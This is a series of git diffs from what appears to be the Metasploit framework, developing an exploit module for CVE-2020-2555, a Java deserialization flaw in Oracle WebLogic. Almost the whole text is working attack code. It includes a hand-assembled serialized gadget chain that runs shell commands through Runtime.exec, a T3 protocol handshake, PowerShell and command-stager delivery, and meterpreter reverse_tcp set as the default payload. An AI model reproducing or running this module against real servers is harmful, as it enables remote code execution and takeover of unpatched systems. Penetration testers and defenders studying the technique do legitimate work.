-    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
-    request_obj << '4c000b'                                              # Field type: Object, field name length: 11
-    request_obj << '696d706c56657273696f'                                # implVersion
+    request_obj << '4c0009'                               # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65'                   # implTitle
+    request_obj << '71007e0005'                           # TC_REFERENCE, handle
+    request_obj << '4c000a'                               # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72'                 # implVendor
+    request_obj << '71007e0005'                           # TC_REFERENCE, handle
+    request_obj << '4c000b'                               # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f'                 # implVersion
     request_obj << '6e'
-    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
-    request_obj << '7870'                                                # TC_ENDBLOCKDATA, TC_NULL
-    request_obj << '7702000078'                                          # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
-    request_obj << 'fe00ff'                                              # separator
+    request_obj << '71007e0005'                           # TC_REFERENCE, handle
+    request_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702000078'                           # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
+    request_obj << 'fe00ff'                               # separator
     request_obj << 'fe010000'
-    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
-    request_obj << '0013'                                                # Class name length: 19
-    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.JVMID
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                 # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
     request_obj << '6a766d2e4a564d4944'
-    request_obj << 'dc49c23ede121e2a'                                    # SerialVersionUID
+    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787077'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
     request_obj << '4621'
     request_obj << '000000000000000000'
-    request_obj << '09'                                                  # length: 9
-    request_obj << '3132372e302e312e31'                                  # 127.0.1.1
-    request_obj << '000b'                                                # length: 11
-    request_obj << '75732d6c2d627265656e'                                # us-l-breens
+    request_obj << '09'                                   # length: 9
+    request_obj << '3132372e302e312e31'                   # 127.0.1.1
+    request_obj << '000b'                                 # length: 11
+    request_obj << '75732d6c2d627265656e'                 # us-l-breens
     request_obj << '73'
     request_obj << 'a53caff10000000700'
     request_obj << '001b59'
@@ -587,15 +588,15 @@ class MetasploitModule < Msf::Exploit::Remote
     request_obj << 'ffffffffffffffffffff'
     request_obj << 'ffffffff'
     request_obj << '0078'
-    request_obj << 'fe010000'                                            # separator
-    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
-    request_obj << '0013'                                                # Class name length: 19
-    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.JVMID
+    request_obj << 'fe010000'                             # separator
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                 # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
     request_obj << '6a766d2e4a564d4944'
-    request_obj << 'dc49c23ede121e2a'                                    # SerialVersionUID
+    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787077'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
     request_obj << '1d0181401281'
     request_obj << '34bf427600093132372e'
     request_obj << '302e312e31a53caff1'
@@ -606,7 +607,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sock.put([request_obj].pack('H*'))
     sleep(1)
-    sock.get_once
   end
 
   def format_payload(payload_cmd)
@@ -625,7 +625,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts={})
     cmd.prepend('/bin/sh -c ')
+
     cmd = build_payload_obj(cmd)
+
     t3_send(cmd)
   end
 
@@ -635,7 +637,13 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Sending handshake...')
     t3_handshake
 
-    print_status('Sending object...')
-    execute_cmdstager(nodelete: true)
+    if target.name == 'Windows'
+      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+      win_obj.prepend('cmd.exe /c ')
+      win_obj = build_payload_obj(win_obj)
+      t3_send(win_obj)
+    else
+      execute_cmdstager
+    end
   end
 end

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -1,0 +1,399 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
+      'Description'    => %q(
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Jang',       # Vuln Discovery
+        'Y4er',       # PoC
+        'Shelby Pace' # Metasploit Module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2020-2555' ],
+          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
+          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
+        ],
+      'Platform'       => %w{ unix win },
+      'Payload'        =>
+        {
+        },
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+            }
+          ],
+          [
+            'Unix',
+            {
+              'Platform' => 'unix',
+            }
+          ],
+        ],
+      'DisclosureDate' => "2020-01-15",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([ Opt::RPORT(7001) ])
+  end
+
+  def check
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def t3_handshake
+    # t3 12.2.1\nAS:255
+    # \nHL:19\nMS:100000
+    # 00\n\n
+    shake = '74332031322e322e310a41533a323535'
+    shake << '0a484c3a31390a4d533a313030303030'
+    shake << '30300a0a'
+
+    sock.put([shake].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def build_payload_obj
+    payload_obj = 'aced'                                  # STREAM_MAGIC
+    payload_obj << '0005'                                 # STREAM_VERSION
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002e'                                 # Class name length: 46
+    payload_obj << '6a617661782e6d616e61'                 # Class name: javax.management.BadAttributeValueExpException
+    payload_obj << '67656d656e742e426164'
+    payload_obj << '41747472696275746556'
+    payload_obj << '616c7565457870457863'
+    payload_obj << '657074696f6e'
+    payload_obj << 'd4e7daab632d4640'                     # SerialVersionUID
+    payload_obj << '020001'                               # Serialization flag, field num = 1
+    payload_obj << '4c0003'                               # Field type code: 4c = Object, field name length: 3
+    payload_obj << '76616c'                               # Field name: val
+    payload_obj << '740012'                               # String, length: 18
+    payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
+    payload_obj << '7872'                                 # end block data, TC_CLASSDESC
+    payload_obj << '0013'                                 # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Exception
+    payload_obj << '457863657074696f6e'
+    payload_obj << 'd0fd1f3e1a3b1cc4'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, No fields
+    payload_obj << '7872'                                 # end block data, TC_CLASSDESC
+    payload_obj << '0013'                                 # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Throwable
+    payload_obj << '5468726f7761626c65'
+    payload_obj << 'd5c635273977b8cb'                     # SerialVersionUID
+    payload_obj << '030004'                               # ?, then 4 fields
+    payload_obj << '4c0005'                               # Field type: Object, field name length: 5
+    payload_obj << '6361757365'                           # Field name: cause
+    payload_obj << '740015'                               # String, length: 21
+    payload_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/Throwable;
+    payload_obj << '2f5468726f7761626c653b'
+    payload_obj << '4c000d'                               # Field type: Object, field name length: 13
+    payload_obj << '64657461696c4d657373616765'           # Field name: detailMessage
+    payload_obj << '740012'                               # String, length: 18
+    payload_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
+    payload_obj << '2f537472696e673b'
+    payload_obj << '5b000a'                               # Field type: 5b = array, field name length: 10
+    payload_obj << '737461636b5472616365'                 # Field name: stackTrace
+    payload_obj << '74001e'                               # String, length: 30
+    payload_obj << '5b4c6a6176612f6c616e'                 # [Ljava/lang/StackTraceElement;
+    payload_obj << '672f537461636b547261'
+    payload_obj << '6365456c656d656e743b'
+    payload_obj << '4c0014'                               # Field type: Object, field name length: 20
+    payload_obj << '73757070726573736564'                 # Field name: suppressedExceptions
+    payload_obj << '457863657074696f6e73'
+    payload_obj << '740010'                               # String, length: 16
+    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/List;
+    payload_obj << '2f4c6973743b'
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0008'                             # handle?
+    payload_obj << '7075'                                 # TC_NULL, TC_ARRAY
+    payload_obj << '72001e'                               # TC_CLASSDESC, Class name length: 30
+    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.StackTraceElement;
+    payload_obj << '672e537461636b547261'
+    payload_obj << '6365456c656d656e743b'
+    payload_obj << '02462a3c3cfd2239'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, No fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000001'
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '001b'                                 # Class name length: 27
+    payload_obj << '6a6176612e6c616e672e'                 # java.lang.StackTraceElement
+    payload_obj << '537461636b5472616365'
+    payload_obj << '456c656d656e74'
+    payload_obj << '6109c59a2636dd85'                     # SerialVersionUID
+    payload_obj << '020004'                               # Serializable, 4 fields
+    payload_obj << '49000a'                               # Field type: 49 = Integer, field name length: 10
+    payload_obj << '6c696e654e756d626572'                 # lineNumber
+    payload_obj << '4c000e'                               # Field type: Object, field name length: 14
+    payload_obj << '6465636c6172696e6743'
+    payload_obj << '6c617373'                             # declaringClass
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0005'                             # handle
+    payload_obj << '4c0008'                               # Field type: Object, field name length: 8
+    payload_obj << '66696c654e616d65'                     # fileName
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0005'                             # handle
+    payload_obj << '4c000a'                               # Field type: Object, field name length: 10
+    payload_obj << '6d6574686f644e616d65'                 # methodName
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0005'                             # handle
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000028'
+    payload_obj << '74000d'                               # String, length: 13
+    payload_obj << '5765626c6f6769635f32353535'           # Weblogic_2555 -> PoC class name -> randomize?
+    payload_obj << '740012'                               # String, length: 18
+    payload_obj << '5765626c6f6769635f32'                 # Weblogic_2555.java
+    payload_obj << '3535352e6a617661'
+    payload_obj << '740004'                               # String, length: 4
+    payload_obj << '6d61696e'                             # main
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0026'                                 # Class name length: 38
+    payload_obj << '6a6176612e7574696c2e'                 # java.util.Collections$UnmodifiableList
+    payload_obj << '436f6c6c656374696f6e'
+    payload_obj << '7324556e6d6f64696669'
+    payload_obj << '61626c654c697374'
+    payload_obj << 'fc0f2531b5ec8e10'                     # SerialVersionUID
+    payload_obj << '020001'                               # Serializable, 1 field
+    payload_obj << '4c0004'                               # Field type: Object, field name length: 4
+    payload_obj << '6c697374'                             # list
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0007'                             # handle
+    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002c'                                 # Class name length: 44
+    payload_obj << '6a6176612e7574696c2e'                 # java.util.Collections$UnmodifiableCollection
+    payload_obj << '436f6c6c656374696f6e'
+    payload_obj << '7324556e6d6f64696669'
+    payload_obj << '61626c65436f6c6c6563'
+    payload_obj << '74696f6e'
+    payload_obj << '19420080cb5ef71e'                     # SerialVersionUID
+    payload_obj << '020001'                               # Serializable, 1 field
+    payload_obj << '4c0001'                               # Field type: Object, field name length: 1
+    payload_obj << '63'                                   # Field name: c
+    payload_obj << '740016'                               # String, length: 22
+    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/Collection;
+    payload_obj << '2f436f6c6c656374696f'
+    payload_obj << '6e3b'
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0013'                                 # Class name length: 19
+    payload_obj << '6a6176612e7574696c2e'                 # java.util.ArrayList
+    payload_obj << '41727261794c697374'
+    payload_obj << '7881d21d99c7619d'                     # SerialVersionUID
+    payload_obj << '030001'                               # ?, 1 field
+    payload_obj << '490004'                               # Field type: Integer, field name length: 4
+    payload_obj << '73697a65'                             # size
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '7704'                                 # TC_BLOCKDATA, length: 4
+    payload_obj << '00000000'
+    payload_obj << '7871'                                 # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << '007e0015'                             # handle
+    payload_obj << '78'                                   # TC_ENDBLOCKDATA
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0024'                                 # Class name length: 36
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.LimitFilter
+    payload_obj << '6f6c2e7574696c2e6669'
+    payload_obj << '6c7465722e4c696d6974'
+    payload_obj << '46696c746572'
+    payload_obj << '954e4590be89865f'                     # SerialVersionUID
+    payload_obj << '020006'                               # Serializable, 6 fields
+    payload_obj << '49000b'                               # Field type: Integer, field name length: 11
+    payload_obj << '6d5f635061676553697a65'               # m_cPageSize
+    payload_obj << '490007'                               # Field type: Integer, field name length: 7
+    payload_obj << '6d5f6e50616765'                       # m_nPage
+    payload_obj << '4c000c'                               # Field type: Object, field name length: 12
+    payload_obj << '6d5f636f6d70617261746f72'             # m_comparator
+    payload_obj << '740016'                               # String, length: 22
+    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/Comparator;
+    payload_obj << '2f436f6d70617261746f'
+    payload_obj << '723b'
+    payload_obj << '4c0008'                               # Field type: Object, field name length: 8
+    payload_obj << '6d5f66696c746572'                     # m_filter
+    payload_obj << '74001a'                               # String, length: 26
+    payload_obj << '4c636f6d2f74616e676f'                 # Lcom/tangosol/util/Filter;
+    payload_obj << '736f6c2f7574696c2f46'
+    payload_obj << '696c7465723b'
+    payload_obj << '4c000f'                               # Field type: Object, field name length: 15
+    payload_obj << '6d5f6f416e63686f7242'                 # m_oAnchorBottom
+    payload_obj << '6f74746f6d'
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0001'                             # handle
+    payload_obj << '4c000c'                               # Field type: Object, field name length: 12
+    payload_obj << '6d5f6f416e63686f72546f70'             # m_oAnchorTop
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0001'                             # handle
+    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '0034'                                 # Class name length: 52
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
+    payload_obj << '6f6c2e7574696c2e6669'
+    payload_obj << '6c7465722e4162737472'
+    payload_obj << '61637451756572795265'
+    payload_obj << '636f7264657246696c74'
+    payload_obj << '6572'
+    payload_obj << 'f3b98201f680eb90'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '00000000'
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002c'                                 # Class name length: 44
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.ChainedExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4368'
+    payload_obj << '61696e65644578747261'
+    payload_obj << '63746f72'
+    payload_obj << '435b250b72f63db5'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '0036'                                 # Class name length: 54
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.AbstractCompositeExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4162'
+    payload_obj << '737472616374436f6d70'
+    payload_obj << '6f736974654578747261'
+    payload_obj << '63746f72'
+    payload_obj << '086b3d8c05690f44'                     # SerialVersionUID
+    payload_obj << '020001'                               # Serializable, 1 field
+    payload_obj << '5b000c'                               # Field type: Array, field name length: 12
+    payload_obj << '6d5f61457874726163746f72'             # m_aExtractor
+    payload_obj << '740023'                               # String, length: 35
+    payload_obj << '5b4c636f6d2f74616e67'                 # [Lcom/tangosol/util/ValueExtractor;
+    payload_obj << '6f736f6c2f7574696c2f'
+    payload_obj << '56616c75654578747261'
+    payload_obj << '63746f723b'
+    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002d'                                 # Class name length: 45
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.AbstractExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4162'
+    payload_obj << '73747261637445787472'
+    payload_obj << '6163746f72'
+    payload_obj << '9b1be18ed70100e5'                     # SerialVersionUID
+    payload_obj << '020001'                               # Serializable, 1 field
+    payload_obj << '490009'                               # Field type: Integer, field name length: 9
+    payload_obj << '6d5f6e546172676574'                   # m_nTarget
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0032'                                 # Class name length: 50
+    payload_obj << '5b4c636f6d2e74616e67'                 # [Lcom.tangosol.util.extractor.ReflectionExtractor;
+    payload_obj << '6f736f6c2e7574696c2e'
+    payload_obj << '657874726163746f722e'
+    payload_obj << '5265666c656374696f6e'
+    payload_obj << '457874726163746f723b'
+    payload_obj << 'dd8b89aed70273ca'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000003'
+    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002f'                                 # Class name length: 47
+    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.ReflectionExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e5265'
+    payload_obj << '666c656374696f6e4578'
+    payload_obj << '74726163746f72'
+    payload_obj << '1f62f564b951b614'                     # SerialVersionUID
+    payload_obj << '020002'                               # Serializable, two fields
+    payload_obj << '5b0009'                               # Field type: Array, field name length: 9
+    payload_obj << '6d5f616f506172616d'                   # m_aoParam
+    payload_obj << '740013'                               # String, length: 19
+    payload_obj << '5b4c6a6176612f6c616e'                 # [Ljava/lang/Object;
+    payload_obj << '672f4f626a6563743b'
+    payload_obj << '4c0009'                               # Object, length: 9
+    payload_obj << '6d5f734d6574686f64'                   # m_sMethod
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0005'                             # handle
+    payload_obj << '7871'                                 # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << '007e001e'                             # handle
+    payload_obj << '00000000'
+    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013'                                 # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.Object;
+    payload_obj << '672e4f626a6563743b'
+    payload_obj << '90ce589f1073296c'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000002'
+    payload_obj << '74000a'                               # String, length: 10
+    payload_obj << '67657452756e74696d65'                 # getRuntime
+    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0012'                                 # Class name length: 18
+    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.Class;
+    payload_obj << '672e436c6173733b'
+    payload_obj << 'ab16d7aecbcd5a99'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '740009'                               # String, length: 9
+    payload_obj << '6765744d6574686f64'                   # getMethod
+    payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
+    payload_obj << '007e0022'                             # handle
+    payload_obj << '00000000'
+    payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
+    payload_obj << '007e0025'                             # handle
+    payload_obj << '00000002'                             # array size: 2
+    payload_obj << '7075'                                 # TC_NULL, TC_ARRAY
+    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '007e0025'                             # handle
+    payload_obj << '00000000'
+    payload_obj << '740006'                               # TC_STRING, length: 6
+    payload_obj << '696e766f6b65'                         # invoke
+    payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
+    payload_obj << '007e0022'                             # handle
+    payload_obj << '00000000'
+    payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
+    payload_obj << '007e0025'                             # handle
+    payload_obj << '00000001'
+    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013'                                 # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.String;
+    payload_obj << '672e537472696e673b'
+    payload_obj << 'add256e7e91d7b47'                     # SerialVersionUID
+    payload_obj << '020000'                               # Serializable, no fields
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000003'
+    payload_obj << '740007'                               # String, length: 7
+    payload_obj << '2f62696e2f7368'                       # /bin/sh
+    payload_obj << '740002'                               # String, length: 2
+    payload_obj << '2d63'                                 # -c
+    payload_obj << '740017'                               # String, length: 23
+    payload_obj << '746f756368202f746d70'                 # touch /tmp/blah_ze_blah
+    payload_obj << '2f626c61685f7a655f62'
+    payload_obj << '6c6168'
+    payload_obj << '740004'                               # String, length: 4
+    payload_obj << '65786563'                             # exec
+    payload_obj << '7070'                                 # TC_NULL, TC_NULL
+    payload_obj << '7672'                                 # TC_CLASS, TC_CLASSDESC
+    payload_obj << '0011'                                 # Class name length: 17
+    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Runtime
+    payload_obj << '52756e74696d65'
+    payload_obj << '0000000000000000'
+    payload_obj << '000000'
+    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+  end
+
+  def t3_send(payload_obj)
+  end
+
+  def exploit
+    connect
+
+    output = t3_handshake
+  end
+end

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -7,9 +7,9 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -212,11 +212,17 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '007e0005' # handle
     payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000028'
-    payload_obj << '74000d' # String, length: 13
-    payload_obj << '5765626c6f6769635f32353535' # Weblogic_2555 -> PoC class name -> randomize?
-    payload_obj << '740012' # String, length: 18
-    payload_obj << '5765626c6f6769635f32' # Weblogic_2555.java
-    payload_obj << '3535352e6a617661'
+
+    class_name = Rex::Text.rand_text_alphanumeric(8..14)
+    formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+
+    payload_obj << '74' # String
+    payload_obj << class_name.length.to_s(16).rjust(4, '0')
+    payload_obj << formatted_class  # Originally Weblogic_2555 -> PoC class name
+    payload_obj << '74' # String
+    payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
+    payload_obj << formatted_class # Originally Weblogic_2555.java
+    payload_obj << '2e6a617661' # .java
     payload_obj << '740004' # String, length: 4
     payload_obj << '6d61696e' # main
     payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Weblogic Deserialize BadAttributeValueExpException',
+        'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
         'Description' => %q{
           There exists a Java object deserialization vulnerability
           in multiple versions of WebLogic.

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Exploit::Remote::Tcp
   include Exploit::CmdStager
-  include Exploit::Remote::HttpClient
+  include Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -51,26 +51,24 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0
     ))
 
-    register_options(
-    [
-      Opt::RPORT(7001),
-      OptString.new('TARGETURI', [ true, 'Base path to Weblogic installation', '/' ])
-    ])
+    register_options([ Opt::RPORT(7001) ])
 
     register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
   end
 
   def check
-    weblogic_uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
-    res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  weblogic_uri
-    )
+    connect
+
+    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
+    sock.put(web_req)
+    sleep(1)
+    res = sock.get_once
+    disconnect
 
     versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
 
     return CheckCode::Unknown('Failed to obtain response from service') unless res
-    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res.body
+    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
     return CheckCode::Unknown('Failed to detect WebLogic') unless version
 
     @version_no = version
@@ -234,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '0024'                                 # Class name length: 36
     payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.LimitFilter
     payload_obj << '6f6c2e7574696c2e6669'
-    payload_obj << '6c7465722e4c696d6974'
+    payload_obj << '6c7465722e4c696d6974'                 # difference in versions 12.2.1.4/12.2.1.3 starts here
     payload_obj << '46696c746572'
     payload_obj << '954e4590be89865f'                     # SerialVersionUID
     payload_obj << '020006'                               # Serializable, 6 fields
@@ -655,8 +653,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    connect
+    unless check == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'The target does not seem to be vulnerable')
+    end
 
+    connect
     print_status('Sending handshake...')
     t3_handshake
 

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -35,12 +35,14 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
         ],
       'Platform'       => %w{ unix linux win },
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
         [
           [
             'Windows',
             {
               'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ],
               'DefaultOptions'  => { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
             }
           ],
@@ -49,6 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        => %w{ unix linux },
               'CmdStagerFlavor' => 'printf',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ],
               'DefaultOptions'  => { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }
             }
           ],

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -263,26 +263,15 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '6f74746f6d'
     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0001'                             # handle
-    # -----------------------------
     payload_obj << '4c000c'                               # Field type: Object, field name length: 12
     payload_obj << '6d5f6f416e63686f72546f70'             # m_oAnchorTop
